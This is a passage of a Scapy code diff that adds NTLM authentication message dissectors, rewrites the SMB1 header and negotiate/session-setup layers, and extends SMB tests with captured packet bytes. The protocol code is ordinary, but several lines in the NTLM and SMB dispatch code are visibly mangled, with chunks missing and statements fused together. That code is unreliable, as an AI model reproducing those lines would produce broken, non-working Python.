LEIntEnumField, + LEThreeBytesField, + StrLenFieldUtf16, + UTCTimeField, + XStrField, + XStrFixedLenField, + XStrLenField, +) +from scapy.packet import Packet +from scapy.sessions import StringBuffer + +from scapy.compat import ( + Any, + Dict, + List, + Tuple, + Optional, +) + +########## +# Fields # +########## + + +class _NTLMPayloadField(_StrField[List[Tuple[str, Any]]]): + """Special field used to dissect NTLM payloads. + This isn't trivial because the offsets are variable.""" + __slots__ = ["fields", "fields_map", "offset"] + islist = True + + def __init__(self, name, offset, fields): + # type: (str, int, List[Field[Any, Any]]) -> None + self.offset = offset + self.fields = fields + self.fields_map = {field.name: field for field in fields} + super(_NTLMPayloadField, self).__init__( + name, + [(field.name, field.default) for field in fields] + ) + + def m2i(self, pkt, x): + # type: (Optional[Packet], bytes) -> List[Tuple[str, str]] + if not pkt or not x: + return [] + results = [] + for field in self.fields: + length = pkt.getfieldval(field.name + "Len") + offset = pkt.getfieldval(field.name + "BufferOffset") - self.offset + if offset < 0: + continue + results.append((offset, field.name, field.getfield( + pkt, x[offset:offset + length])[1])) + results.sort(key=lambda x: x[0]) + return [x[1:] for x in results] + + def i2m(self, pkt, x): + # type: (Optional[Packet], Optional[List[Tuple[str, str]]]) -> bytes + buf = StringBuffer() + for field_name, value in x: + if field_name not in self.fields_map: + continue + field = self.fields_map[field_name] + offset = pkt.getfieldval( + field_name + "BufferOffset") or len(buf) + buf.append(field.addfield(pkt, b"", value), offset + 1) + return bytes(buf) + + def i2h(self, pkt, x): + # type: (Optional[Packet], bytes) -> List[Tuple[str, str]] + if not pkt or not x: + return [] + results = [] + for field_name, value in x: + if field_name not in self.fields_map: + continue + results.append( + (field_name, self.fields_map[field_name].i2h(pkt, value))) + return results + + +def _NTML_post_build(self, p, pay_offset, fields): + # type: (Packet, bytes, int, Dict[str, Tuple[str, int]]) -> bytes + """Util function to build the offset and populate the lengths""" + for field_name, value in self.Payload: + length = self.get_field( + "Payload").fields_map[field_name].i2len(self, value) + offset = fields[field_name] + # Length + if self.getfieldval(field_name + "Len") is None: + p = p[:offset] + \ + struct.pack("!H", length) + p[offset + 2:] + # MaxLength + if self.getfieldval(field_name + "MaxLen") is None: + p = p[:offset + 2] + \ + struct.pack("!H", length) + p[offset + 4:] + # Offset + if self.getfieldval(field_name + "BufferOffset") is None: + p = p[:offset + 4] + \ + struct.pack("!I", pay_offset) + p[offset + 8:] + pay_offset += length + return p + + +############## +# Structures # +############## + + +# Sect 2.2 + + +class NTLM_Header(Packet): + name = "NTLM Header" + fields_desc = [ + StrFixedLenField('Signature', b'NTLMSSP\0', length=8), + LEIntEnumField('MessageType', 3, {1: 'NEGOTIATE_MESSAGE', + 2: 'CHALLENGE_MESSAGE', + 3: 'AUTHENTICATE_MESSAGE'}), + ] + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 10: + MessageType = struct.unpack(" bytes + return _NTML_post_build(self, pkt, self.OFFSET, { + "DomainName": 16, + "WorkstationName": 24, + }) + pay + +# Challenge + + +class Single_Host_Data(Packet): + fields_desc = [ + LEIntField("Size", 0), + LEIntField("Z4", 0), + XStrFixedLenField("CustomData", b"", length=8), + XStrFixedLenField("MachineID", b"", length=32), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +class AV_PAIR(Packet): + name = "NTLM AV Pair" + fields_desc = [ + LEShortEnumField('AvId', 0, { + 0x0000: "MsvAvEOL", + 0x0001: "MsvAvNbComputerName", + 0x0002: "MsvAvNbDomainName", + 0x0003: "MsvAvDnsComputerName", + 0x0004: "MsvAvDnsDomainName", + 0x0005: "MsvAvDnsTreeName", + 0x0006: "MsvAvFlags", + 0x0007: "MsvAvTimestamp", + 0x0008: "MsvAvSingleHost", + 0x0009: "MsvAvTargetName", + 0x000A: "MsvAvChannelBindings", + }), + FieldLenField('AvLen', None, length_of="Value", fmt=" bytes + return _NTML_post_build(self, pkt, self.OFFSET, { + "TargetName": 12, + "TargetInfo": 40, + }) + pay + + +# Authenticate + +class LM_RESPONSE(Packet): + fields_desc = [ + StrFixedLenField("Response", b"", length=24), + ] + + +class LMv2_RESPONSE(Packet): + fields_desc = [ + StrFixedLenField("Response", b"", length=16), + StrFixedLenField("ChallengeFromClient", b"", length=8), + ] + + +class NTLM_RESPONSE(Packet): + fields_desc = [ + StrFixedLenField("Response", b"", length=24), + ] + + +class NTLMv2_CLIENT_CHALLENGE(Packet): + fields_desc = [ + ByteField("RespType", 0), + ByteField("HiRespType", 0), + LEShortField("Reserved1", 0), + LEIntField("Reserved2", 0), + UTCTimeField("TimeStamp", None, fmt=" bytes + return _NTML_post_build(self, pkt, self.OFFSET, { + "LmChallengeResponse": 12, + "NtChallengeResponse": 20, + "DomainName": 28, + "UserName": 36, + "Workstation": 44, + "EncryptedRandomSessionKey": 52 + }) + pay + + +class NTLM_AUTHENTICATE_V2(NTLM_AUTHENTICATE): + NTLM_VERSION = 2 + + +def HTTP_ntlm_negotiate(ntlm_negotiate): + """Create an HTTP NTLM negotiate packet from an NTLM_NEGOTIATE message""" + assert isinstance(ntlm_negotiate, NTLM_NEGOTIATE) + from scapy.layers.http import HTTP, HTTPRequest + return HTTP() / HTTPRequest( + Authorization=b"NTLM " + bytes_base64(bytes(ntlm_negotiate)) + ) diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index 748be488f1c..6f08fb5344c 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -5,34 +5,478 @@ """ SMB (Server Message Block), also known as CIFS. + +Specs: +- [MS-CIFS] (base) +- [MS-SMB] (extension of CIFS - SMB v1) """ -from scapy.packet import Packet, bind_layers -from scapy.fields import BitField, ByteEnumField, ByteField, FlagsField, \ - LEFieldLenField, LEIntField, LELongField, LEShortField, ShortField, \ - StrFixedLenField, StrLenField, StrNullField +import struct + +from scapy.config import conf +from scapy.packet import Packet, bind_layers, bind_top_down +from scapy.fields import ( + ByteEnumField, + ByteField, + FlagsField, + LEFieldLenField, + LEIntField, + LELongField, + LEShortField, + MultipleTypeField, + PacketLenField, + PacketListField, + ReversePadField, + ShortField, + StrFixedLenField, + StrLenField, + StrNullField, + StrNullFieldUtf16, + UTCTimeField, + UUIDField, + XStrLenField, +) from scapy.layers.netbios import NBTSession +from scapy.layers.gssapi import GSSAPI_BLOB from scapy.layers.smb2 import SMB2_Header - -# SMB NetLogon Response Header -class SMBNetlogon_Protocol_Response_Header(Packet): - name = "SMBNetlogon Protocol Response Header" +SMB_COM = { + 0x00: "SMB_COM_CREATE_DIRECTORY", + 0x01: "SMB_COM_DELETE_DIRECTORY", + 0x02: "SMB_COM_OPEN", + 0x03: "SMB_COM_CREATE", + 0x04: "SMB_COM_CLOSE", + 0x05: "SMB_COM_FLUSH", + 0x06: "SMB_COM_DELETE", + 0x07: "SMB_COM_RENAME", + 0x08: "SMB_COM_QUERY_INFORMATION", + 0x09: "SMB_COM_SET_INFORMATION", + 0x0A: "SMB_COM_READ", + 0x0B: "SMB_COM_WRITE", + 0x0C: "SMB_COM_LOCK_BYTE_RANGE", + 0x0D: "SMB_COM_UNLOCK_BYTE_RANGE", + 0x0E: "SMB_COM_CREATE_TEMPORARY", + 0x0F: "SMB_COM_CREATE_NEW", + 0x10: "SMB_COM_CHECK_DIRECTORY", + 0x11: "SMB_COM_PROCESS_EXIT", + 0x12: "SMB_COM_SEEK", + 0x13: "SMB_COM_LOCK_AND_READ", + 0x14: "SMB_COM_WRITE_AND_UNLOCK", + 0x1A: "SMB_COM_READ_RAW", + 0x1B: "SMB_COM_READ_MPX", + 0x1C: "SMB_COM_READ_MPX_SECONDARY", + 0x1D: "SMB_COM_WRITE_RAW", + 0x1E: "SMB_COM_WRITE_MPX", + 0x1F: "SMB_COM_WRITE_MPX_SECONDARY", + 0x20: "SMB_COM_WRITE_COMPLETE", + 0x21: "SMB_COM_QUERY_SERVER", + 0x22: "SMB_COM_SET_INFORMATION2", + 0x23: "SMB_COM_QUERY_INFORMATION2", + 0x24: "SMB_COM_LOCKING_ANDX", + 0x25: "SMB_COM_TRANSACTION", + 0x26: "SMB_COM_TRANSACTION_SECONDARY", + 0x27: "SMB_COM_IOCTL", + 0x28: "SMB_COM_IOCTL_SECONDARY", + 0x29: "SMB_COM_COPY", + 0x2A: "SMB_COM_MOVE", + 0x2B: "SMB_COM_ECHO", + 0x2C: "SMB_COM_WRITE_AND_CLOSE", + 0x2D: "SMB_COM_OPEN_ANDX", + 0x2E: "SMB_COM_READ_ANDX", + 0x2F: "SMB_COM_WRITE_ANDX", + 0x30: "SMB_COM_NEW_FILE_SIZE", + 0x31: "SMB_COM_CLOSE_AND_TREE_DISC", + 0x32: "SMB_COM_TRANSACTION2", + 0x33: "SMB_COM_TRANSACTION2_SECONDARY", + 0x34: "SMB_COM_FIND_CLOSE2", + 0x35: "SMB_COM_FIND_NOTIFY_CLOSE", + 0x70: "SMB_COM_TREE_CONNECT", + 0x71: "SMB_COM_TREE_DISCONNECT", + 0x72: "SMB_COM_NEGOTIATE", + 0x73: "SMB_COM_SESSION_SETUP_ANDX", + 0x74: "SMB_COM_LOGOFF_ANDX", + 0x75: "SMB_COM_TREE_CONNECT_ANDX", + 0x7E: "SMB_COM_SECURITY_PACKAGE_ANDX", + 0x80: "SMB_COM_QUERY_INFORMATION_DISK", + 0x81: "SMB_COM_SEARCH", + 0x82: "SMB_COM_FIND", + 0x83: "SMB_COM_FIND_UNIQUE", + 0x84: "SMB_COM_FIND_CLOSE", + 0xA0: "SMB_COM_NT_TRANSACT", + 0xA1: "SMB_COM_NT_TRANSACT_SECONDARY", + 0xA2: "SMB_COM_NT_CREATE_ANDX", + 0xA4: "SMB_COM_NT_CANCEL", + 0xA5: "SMB_COM_NT_RENAME", + 0xC0: "SMB_COM_OPEN_PRINT_FILE", + 0xC1: "SMB_COM_WRITE_PRINT_FILE", + 0xC2: "SMB_COM_CLOSE_PRINT_FILE", + 0xC3: "SMB_COM_GET_PRINT_QUEUE", + 0xD8: "SMB_COM_READ_BULK", + 0xD9: "SMB_COM_WRITE_BULK", + 0xDA: "SMB_COM_WRITE_BULK_DATA", + 0xFE: "SMB_COM_INVALID", + 0xFF: "SMB_COM_NO_ANDX_COMMAND", +} + + +class SMB_Header(Packet): + name = "SMB 1 Protocol Request Header" fields_desc = [StrFixedLenField("Start", b"\xffSMB", 4), - ByteEnumField("Command", 0x25, {0x25: "Trans"}), - ByteField("Error_Class", 0x02), - ByteField("Reserved", 0), - LEShortField("Error_code", 4), - ByteField("Flags", 0), - LEShortField("Flags2", 0x0000), + ByteEnumField("Command", 0x72, SMB_COM), + LEIntField("Status", 0), + FlagsField("Flags", 0x18, 8, + ["LOCK_AND_READ_OK", + "BUF_AVAIL", + "res", + "CASE_INSENSITIVE", + "CANONICALIZED_PATHS", + "OPLOCK", + "OPBATCH", + "REPLY"]), + FlagsField("Flags2", 0x0000, -16, + ["LONG_NAMES", + "EAS", + "SMB_SECURITY_SIGNATURE", + "COMPRESSED", + "SMB_SECURITY_SIGNATURE_REQUIRED", + "res", + "IS_LONG_NAME", + "res", + "res", + "res", + "REPARSE_PATH", + "EXTENDED_SECURITY", + "DFS", + "PAGING_IO", + "NT_STATUS", + "UNICODE"]), LEShortField("PIDHigh", 0x0000), - LELongField("Signature", 0x0), - LEShortField("Unused", 0x0), + LELongField("SecurityFeatures", 0x0), + LEShortField("Reserved", 0x0), LEShortField("TID", 0), - LEShortField("PID", 0), + LEShortField("PID", 1), LEShortField("UID", 0), - LEShortField("MID", 0), - ByteField("WordCount", 17), + LEShortField("MID", 2)] + + def guess_payload_class(self, payload): + # type: (bytes) -> Packet + if self.Command == 0x72: + if self.Flags.REPLY: + if self.Flags2.EXTENDED_SECURITY: + return SMBNegotiate_Response_Extended_Security + else: + return SMBNegotiate_Response_Security + else: + return SMBNegotiate_Request + elif self.Command == 0x73: + if self.Flags.REPLY: + if self.Flags2.EXTENDED_SECURITY: + return SMBSession_Setup_AndX_Response_Extended_Security + else: + return SMBSession_Setup_AndX_Response + else: + if self.Flags2.EXTENDED_SECURITY: + return SMBSession_Setup_AndX_Request_Extended_Security + else: + return SMBSession_Setup_AndX_Request + elif self.Command == 0x25: + return SMBNetlogon_Protocol_Response_Header + return super(SMB_Header, self).guess_payload_class(payload) + +# SMB Negotiate Request + + +class SMB_Dialect(Packet): + name = "SMB Dialect" + fields_desc = [ByteField("BufferFormat", 0x02), + StrNullField("DialectString", "NT LM 0.12")] + + def default_payload_class(self, payload): + return conf.padding_layer + + +class SMBNegotiate_Request(Packet): + name = "SMB Negotiate Request" + fields_desc = [ByteField("WordCount", 0), + LEFieldLenField("ByteCount", None, length_of="Dialects", + adjust=lambda pkt, x: x + 1), + PacketListField( + "Dialects", [SMB_Dialect()], SMB_Dialect, + length_from=lambda pkt: pkt.ByteCount) + ] + + +bind_layers(SMB_Header, SMBNegotiate_Request, Command=0x72) + +# SMBNegociate Protocol Response + + +class _SMBNegotiate_Response(Packet): + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 2: + # Yes this is inspired by + # https://github.com/wireshark/wireshark/blob/925e01b23fd5aad2fa929fafd894128a88832e74/epan/dissectors/packet-smb.c#L2902 + wc = struct.unpack("= 4: if _pkt[:4] == b'\xffSMB': - return SMBNegociate_Protocol_Request_Header + return SMB_Header if _pkt[:4] == b'\xfeSMB': return SMB2_Header return cls -# SMB Negotiate Protocol Request Tail - - -class SMBNegociate_Protocol_Request_Tail(Packet): - name = "SMB Negotiate Protocol Request Tail" - fields_desc = [ByteField("BufferFormat", 0x02), - StrNullField("BufferData", "NT LM 0.12")] - -# SMBNegociate Protocol Response Advanced Security - - -class SMBNegociate_Protocol_Response_Advanced_Security(Packet): - name = "SMBNegociate Protocol Response Advanced Security" - fields_desc = [StrFixedLenField("Start", b"\xffSMB", 4), - ByteEnumField("Command", 0x72, {0x72: "SMB_COM_NEGOTIATE"}), - ByteField("Error_Class", 0), - ByteField("Reserved", 0), - LEShortField("Error_Code", 0), - ByteField("Flags", 0x98), - LEShortField("Flags2", 0x0000), - LEShortField("PIDHigh", 0x0000), - LELongField("Signature", 0x0), - LEShortField("Unused", 0x0), - LEShortField("TID", 0), - LEShortField("PID", 1), - LEShortField("UID", 0), - LEShortField("MID", 2), - ByteField("WordCount", 17), - LEShortField("DialectIndex", 7), - ByteField("SecurityMode", 0x03), - LEShortField("MaxMpxCount", 50), - LEShortField("MaxNumberVC", 1), - LEIntField("MaxBufferSize", 16144), - LEIntField("MaxRawSize", 65536), - LEIntField("SessionKey", 0x0000), - LEShortField("ServerCapabilities", 0xf3f9), - BitField("UnixExtensions", 0, 1), - BitField("Reserved2", 0, 7), - BitField("ExtendedSecurity", 1, 1), - BitField("CompBulk", 0, 2), - BitField("Reserved3", 0, 5), - # There have been 127490112000000000 tenths of micro-seconds between 1st january 1601 and 1st january 2005. 127490112000000000=0x1C4EF94D6228000, so ServerTimeHigh=0xD6228000 and ServerTimeLow=0x1C4EF94. # noqa: E501 - LEIntField("ServerTimeHigh", 0xD6228000), - LEIntField("ServerTimeLow", 0x1C4EF94), - LEShortField("ServerTimeZone", 0x3c), - ByteField("EncryptionKeyLength", 0), - LEFieldLenField("ByteCount", None, "SecurityBlob", adjust=lambda pkt, x: x - 16), # noqa: E501 - BitField("GUID", 0, 128), - StrLenField("SecurityBlob", "", length_from=lambda x: x.ByteCount + 16)] # noqa: E501 - -# SMBNegociate Protocol Response No Security -# When using no security, with EncryptionKeyLength=8, you must have an EncryptionKey before the DomainName # noqa: E501 - - -class SMBNegociate_Protocol_Response_No_Security(Packet): - name = "SMBNegociate Protocol Response No Security" - fields_desc = [StrFixedLenField("Start", b"\xffSMB", 4), - ByteEnumField("Command", 0x72, {0x72: "SMB_COM_NEGOTIATE"}), - ByteField("Error_Class", 0), - ByteField("Reserved", 0), - LEShortField("Error_Code", 0), - ByteField("Flags", 0x98), - LEShortField("Flags2", 0x0000), - LEShortField("PIDHigh", 0x0000), - LELongField("Signature", 0x0), - LEShortField("Unused", 0x0), - LEShortField("TID", 0), - LEShortField("PID", 1), - LEShortField("UID", 0), - LEShortField("MID", 2), - ByteField("WordCount", 17), - LEShortField("DialectIndex", 7), - ByteField("SecurityMode", 0x03), - LEShortField("MaxMpxCount", 50), - LEShortField("MaxNumberVC", 1), - LEIntField("MaxBufferSize", 16144), - LEIntField("MaxRawSize", 65536), - LEIntField("SessionKey", 0x0000), - LEShortField("ServerCapabilities", 0xf3f9), - BitField("UnixExtensions", 0, 1), - BitField("Reserved2", 0, 7), - BitField("ExtendedSecurity", 0, 1), - FlagsField("CompBulk", 0, 2, "CB"), - BitField("Reserved3", 0, 5), - # There have been 127490112000000000 tenths of micro-seconds between 1st january 1601 and 1st january 2005. 127490112000000000=0x1C4EF94D6228000, so ServerTimeHigh=0xD6228000 and ServerTimeLow=0x1C4EF94. # noqa: E501 - LEIntField("ServerTimeHigh", 0xD6228000), - LEIntField("ServerTimeLow", 0x1C4EF94), - LEShortField("ServerTimeZone", 0x3c), - ByteField("EncryptionKeyLength", 8), - LEShortField("ByteCount", 24), - BitField("EncryptionKey", 0, 64), - StrNullField("DomainName", "WORKGROUP"), - StrNullField("ServerName", "RMFF1")] - -# SMBNegociate Protocol Response No Security No Key - - -class SMBNegociate_Protocol_Response_No_Security_No_Key(Packet): - namez = "SMBNegociate Protocol Response No Security No Key" - fields_desc = [StrFixedLenField("Start", b"\xffSMB", 4), - ByteEnumField("Command", 0x72, {0x72: "SMB_COM_NEGOTIATE"}), - ByteField("Error_Class", 0), - ByteField("Reserved", 0), - LEShortField("Error_Code", 0), - ByteField("Flags", 0x98), - LEShortField("Flags2", 0x0000), - LEShortField("PIDHigh", 0x0000), - LELongField("Signature", 0x0), - LEShortField("Unused", 0x0), - LEShortField("TID", 0), - LEShortField("PID", 1), - LEShortField("UID", 0), - LEShortField("MID", 2), - ByteField("WordCount", 17), - LEShortField("DialectIndex", 7), - ByteField("SecurityMode", 0x03), - LEShortField("MaxMpxCount", 50), - LEShortField("MaxNumberVC", 1), - LEIntField("MaxBufferSize", 16144), - LEIntField("MaxRawSize", 65536), - LEIntField("SessionKey", 0x0000), - LEShortField("ServerCapabilities", 0xf3f9), - BitField("UnixExtensions", 0, 1), - BitField("Reserved2", 0, 7), - BitField("ExtendedSecurity", 0, 1), - FlagsField("CompBulk", 0, 2, "CB"), - BitField("Reserved3", 0, 5), - # There have been 127490112000000000 tenths of micro-seconds between 1st january 1601 and 1st january 2005. 127490112000000000=0x1C4EF94D6228000, so ServerTimeHigh=0xD6228000 and ServerTimeLow=0x1C4EF94. # noqa: E501 - LEIntField("ServerTimeHigh", 0xD6228000), - LEIntField("ServerTimeLow", 0x1C4EF94), - LEShortField("ServerTimeZone", 0x3c), - ByteField("EncryptionKeyLength", 0), - LEShortField("ByteCount", 16), - StrNullField("DomainName", "WORKGROUP"), - StrNullField("ServerName", "RMFF1")] - -# Session Setup AndX Request - -class SMBSession_Setup_AndX_Request(Packet): - name = "Session Setup AndX Request" - fields_desc = [StrFixedLenField("Start", b"\xffSMB", 4), - ByteEnumField("Command", 0x73, {0x73: "SMB_COM_SESSION_SETUP_ANDX"}), # noqa: E501 - ByteField("Error_Class", 0), - ByteField("Reserved", 0), - LEShortField("Error_Code", 0), - ByteField("Flags", 0x18), - LEShortField("Flags2", 0x0001), - LEShortField("PIDHigh", 0x0000), - LELongField("Signature", 0x0), - LEShortField("Unused", 0x0), - LEShortField("TID", 0), - LEShortField("PID", 1), - LEShortField("UID", 0), - LEShortField("MID", 2), - ByteField("WordCount", 13), - ByteEnumField("AndXCommand", 0x75, {0x75: "SMB_COM_TREE_CONNECT_ANDX"}), # noqa: E501 - ByteField("Reserved2", 0), - LEShortField("AndXOffset", 96), - LEShortField("MaxBufferS", 2920), - LEShortField("MaxMPXCount", 50), - LEShortField("VCNumber", 0), - LEIntField("SessionKey", 0), - LEFieldLenField("ANSIPasswordLength", None, "ANSIPassword"), - LEShortField("UnicodePasswordLength", 0), - LEIntField("Reserved3", 0), - LEShortField("ServerCapabilities", 0x05), - BitField("UnixExtensions", 0, 1), - BitField("Reserved4", 0, 7), - BitField("ExtendedSecurity", 0, 1), - BitField("CompBulk", 0, 2), - BitField("Reserved5", 0, 5), - LEShortField("ByteCount", 35), - StrLenField("ANSIPassword", "Pass", length_from=lambda x: x.ANSIPasswordLength), # noqa: E501 - StrNullField("Account", "GUEST"), - StrNullField("PrimaryDomain", ""), - StrNullField("NativeOS", "Windows 4.0"), - StrNullField("NativeLanManager", "Windows 4.0"), - ByteField("WordCount2", 4), - ByteEnumField("AndXCommand2", 0xFF, {0xFF: "SMB_COM_NONE"}), - ByteField("Reserved6", 0), - LEShortField("AndXOffset2", 0), - LEShortField("Flags3", 0x2), - LEShortField("PasswordLength", 0x1), - LEShortField("ByteCount2", 18), - ByteField("Password", 0), - StrNullField("Path", "\\\\WIN2K\\IPC$"), - StrNullField("Service", "IPC")] - -# Session Setup AndX Response - - -class SMBSession_Setup_AndX_Response(Packet): - name = "Session Setup AndX Response" - fields_desc = [StrFixedLenField("Start", b"\xffSMB", 4), - ByteEnumField("Command", 0x73, {0x73: "SMB_COM_SESSION_SETUP_ANDX"}), # noqa: E501 - ByteField("Error_Class", 0), - ByteField("Reserved", 0), - LEShortField("Error_Code", 0), - ByteField("Flags", 0x90), - LEShortField("Flags2", 0x1001), - LEShortField("PIDHigh", 0x0000), - LELongField("Signature", 0x0), - LEShortField("Unused", 0x0), - LEShortField("TID", 0), - LEShortField("PID", 1), - LEShortField("UID", 0), - LEShortField("MID", 2), - ByteField("WordCount", 3), - ByteEnumField("AndXCommand", 0x75, {0x75: "SMB_COM_TREE_CONNECT_ANDX"}), # noqa: E501 - ByteField("Reserved2", 0), - LEShortField("AndXOffset", 66), - LEShortField("Action", 0), - LEShortField("ByteCount", 25), - StrNullField("NativeOS", "Windows 4.0"), - StrNullField("NativeLanManager", "Windows 4.0"), - StrNullField("PrimaryDomain", ""), - ByteField("WordCount2", 3), - ByteEnumField("AndXCommand2", 0xFF, {0xFF: "SMB_COM_NONE"}), - ByteField("Reserved3", 0), - LEShortField("AndXOffset2", 80), - LEShortField("OptionalSupport", 0x01), - LEShortField("ByteCount2", 5), - StrNullField("Service", "IPC"), - StrNullField("NativeFileSystem", "")] - - -bind_layers(NBTSession, SMBNegociate_Protocol_Request_Header_Generic, ) -bind_layers(NBTSession, SMBNegociate_Protocol_Response_Advanced_Security, ExtendedSecurity=1) # noqa: E501 -bind_layers(NBTSession, SMBNegociate_Protocol_Response_No_Security, ExtendedSecurity=0, EncryptionKeyLength=8) # noqa: E501 -bind_layers(NBTSession, SMBNegociate_Protocol_Response_No_Security_No_Key, ExtendedSecurity=0, EncryptionKeyLength=0) # noqa: E501 -bind_layers(NBTSession, SMBSession_Setup_AndX_Request, ) -bind_layers(NBTSession, SMBSession_Setup_AndX_Response, ) -bind_layers(SMBNegociate_Protocol_Request_Header, SMBNegociate_Protocol_Request_Tail, ) # noqa: E501 -bind_layers(SMBNegociate_Protocol_Request_Tail, SMBNegociate_Protocol_Request_Tail, ) # noqa: E501 +bind_layers(NBTSession, SMBNegociate_Protocol_Request_Header_Generic) diff --git a/scapy/packet.py b/scapy/packet.py index 0ceadb3d253..ba0f81c05e7 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -651,7 +651,17 @@ def self_build(self): if isinstance(val, RawVal): p += bytes(val) else: - p = f.addfield(self, p, val) + try: + p = f.addfield(self, p, val) + except Exception as ex: + try: + ex.args = ( + "While disescting field '%s': " % f.name + + ex.args[0], + ) + ex.args[1:] + except (AttributeError, IndexError): + pass + raise ex return p def do_build_payload(self): diff --git a/test/scapy/layers/smb.uts b/test/scapy/layers/smb.uts index 79c16023913..357535dc644 100644 --- a/test/scapy/layers/smb.uts +++ b/test/scapy/layers/smb.uts @@ -1,6 +1,10 @@ ############ ############ -+ SMB ++ SMB basic tests + += Import + +from scapy.layers.smb import * = test SMB Negociate Header - dissect @@ -11,8 +15,8 @@ pkt = IP(rawpkt) assert TCP in pkt assert NBTSession in pkt assert pkt[NBTSession].LENGTH == 47 -assert SMBNegociate_Protocol_Request_Header in pkt -smb = pkt[SMBNegociate_Protocol_Request_Header] +assert SMBNegotiate_Request in pkt +smb = pkt[SMB_Header] # Check header values print(smb.show()) assert smb.Start == b'\xffSMB' @@ -27,12 +31,103 @@ assert NBTSession in pkt assert pkt[NBTSession].LENGTH == 47 assert SMBNegociate_Protocol_Request_Header_Generic in pkt # Should not have a proper SMBNegociate header as magic is \xf0SMB, not \xffSMB -assert SMBNegociate_Protocol_Request_Header not in pkt +assert SMB_Header not in pkt = test SMB Negociate Header - assemble -pkt = IP() / TCP() / NBTSession() / SMBNegociate_Protocol_Request_Header() +pkt = IP() / TCP() / NBTSession() / SMB_Header() / SMBNegotiate_Request() +pkt = IP(raw(pkt)) assert pkt[NBTSession].TYPE == 0x00 # session message -smb = pkt[SMBNegociate_Protocol_Request_Header] +smb = pkt[SMB_Header] assert smb.Start == b'\xffSMB' + ++ SMB NTLM exchange + += SMB Negotiate Request + +smb_nego_req = Ether(b'\x00PV\xc0\x00\x01\x00\x0c)a\xf5_\x08\x00E\x00\x00\xb1Qe\x00\x00\x80\x06\xd9\t\xc0\xa8\xc7\x85\xc0\xa8\xc7\x01\xc2\x08\x00\x8b\xd7\xcb\xeeR\x10]{\xadP\x18\x01\x00\xd1w\x00\x00\x00\x00\x00\x85\xffSMBr\x00\x00\x00\x00\x18C\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00') +assert SMBNegotiate_Request in smb_nego_req +assert smb_nego_req.Flags2.EXTENDED_SECURITY +assert smb_nego_req.Flags2.UNICODE +assert len(smb_nego_req[SMBNegotiate_Request].Dialects) == 6 +assert smb_nego_req[SMBNegotiate_Request].Dialects[0].DialectString == b'PC NETWORK PROGRAM 1.0' +assert smb_nego_req[SMBNegotiate_Request].Dialects[5].DialectString == b'NT LM 0.12' + += SMB Negotiate Response Extended Security + +smb_nego_resp = Ether(b'\x00\x0c)a\xf5_\x00PV\xc0\x00\x01\x08\x00E\x00\x01\xc1\x03H@\x00\x80\x06\xe6\x16\xc0\xa8\xc7\x01\xc0\xa8\xc7\x85\x00\x8b\xc2\x08\x10]{\xad\xd7\xcb\xee\xdbP\x18\x01\x0047\x00\x00\x00\x00\x01\x95\xffSMBr\x00\x00\x00\x00\x98C\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x11\x05\x00\x03\n\x00\x01\x00\x04\x11\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\xfc\xe3\x01\x80\x1dc6\x9b\x84\'\xd2\x01\x88\xff\x00P\x01,\xd0=?\xb2\x00\xe1O\xbd\xd4\xc8\xb7\x0c\'Vf`\x82\x01<\x06\x06+\x06\x01\x05\x05\x02\xa0\x82\x0100\x82\x01,\xa0\x1a0\x18\x06\n+\x06\x01\x04\x01\x827\x02\x02\x1e\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xa2\x82\x01\x0c\x04\x82\x01\x08NEGOEXTS\x01\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00p\x00\x00\x001<*:\xc7+<\xa9m\xac8t\xa7\xdd\x1d[\xf4Rk\x17\x03\x8aK\x91\xc2\t}\x9a\x8f\xe6,\x96\\Q$/\x90MG\xc7\xad\x8f\x87k"\x02\xbf\xc6\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08NEGOEXTS\x03\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x98\x00\x00\x001<*:\xc7+<\xa9m\xac8t\xa7\xdd\x1d[\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08@\x00\x00\x00X\x00\x00\x000V\xa0T0R0\'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key0\'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key') +assert SMBNegotiate_Response_Extended_Security in smb_nego_resp +assert smb_nego_resp[SMBNegotiate_Response_Extended_Security].ServerTime == 131210789640364829 +assert isinstance(smb_nego_resp.SecurityBlob, GSSAPI_BLOB) +assert smb_nego_resp.SecurityBlob.MechType.oidname == 'SPNEGO - Simple Protected Negotiation' +assert smb_nego_resp.SecurityBlob.innerContextToken.token.mechTypes[0].oid.oidname == 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism' +assert smb_nego_resp.ServerCapabilities.EXTENDED_SECURITY +assert smb_nego_resp.Flags2.EXTENDED_SECURITY +assert smb_nego_resp.SecurityBlob.innerContextToken.token.mechToken.value # TODO: Implement + += SMB Setup AndX Request (ES) + +from scapy.layers.ntlm import * + +smb_sax_req_1 = 